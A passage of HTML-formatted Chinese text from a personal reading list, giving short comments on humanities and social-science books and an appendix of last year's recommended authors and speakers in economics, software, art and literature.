11pt;text-indent: 0pt;letter-spacing: 0.034em;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">七、人文社科：多学科交相辉映，也容易惠己达人</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="72" valign="top" style="width:69.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">赵林</span></p></td><td width="481" valign="top" style="width: 476pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《西方哲学史讲演录》，跨年读，好枯燥，要坚持。学哲学的目的是为了智慧，为了找到启发，找到心灵的力量，即心力。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">要能认出批发零售的精神掮客。</span></p></td></tr><tr><td width="72" valign="top" style="width:70.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">严飞、刘明轩</span></p></td><td width="481" valign="top" style="width: 474.7pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《事件社会学》。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">“传统叙事史学强调事件的重要性，而社会学则关注事件背后的社会机制和运行逻辑”，</span><span style="font-family: 微软雅黑;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">值得再读！对研发会有很多启发。</span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><br/></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:等线;mso-ascii-font-family:等线;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">附、我的上届“书单”</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">推荐</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">简评</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">江小涓</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《江小涓学术自传》，求真务实的经济学者。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">梅宏</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">请了江小涓，在计算机顶会上讲经济学和数字化。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Elon Musk</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">第一性原理，</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">5</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">步法；这个人是个实干家，也是思想家。</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">李国杰</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">“高质量发展的必经之路是从资源要素驱动转变为创新要素驱动”。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">DJ Schleen</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">画的一手好图，尤其是安全的“地铁轨道图”。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">柯文哲</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">这就是科学，生死之间。</span></p></td></tr><tr><td width="93" valign="top" style="width:64.35pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Keunwoo Lee</span></p></td><td width="459" valign="top" style="width:481.25pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">勇敢地说出某软件工程经典书，是伪经，手撕大师。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">陈丹青</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">局部系列，“十来岁，元气淋漓最宝贵”。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">木心</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">陈丹青的师尊。《文学回忆录》</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">傅雷</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">1934</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">年《世界美术名作</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">20</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">讲》的序，我读来，觉得国民性百年巨变，又百年未变。</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">陶景文</span>        <o:page></o:page></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">数字化转型必修课，没有抽象概念，都是生动的例子，起步很顺滑。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">谢春生</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">工业软件研究框架，工业软件的框架和概念，比较接近</span><span 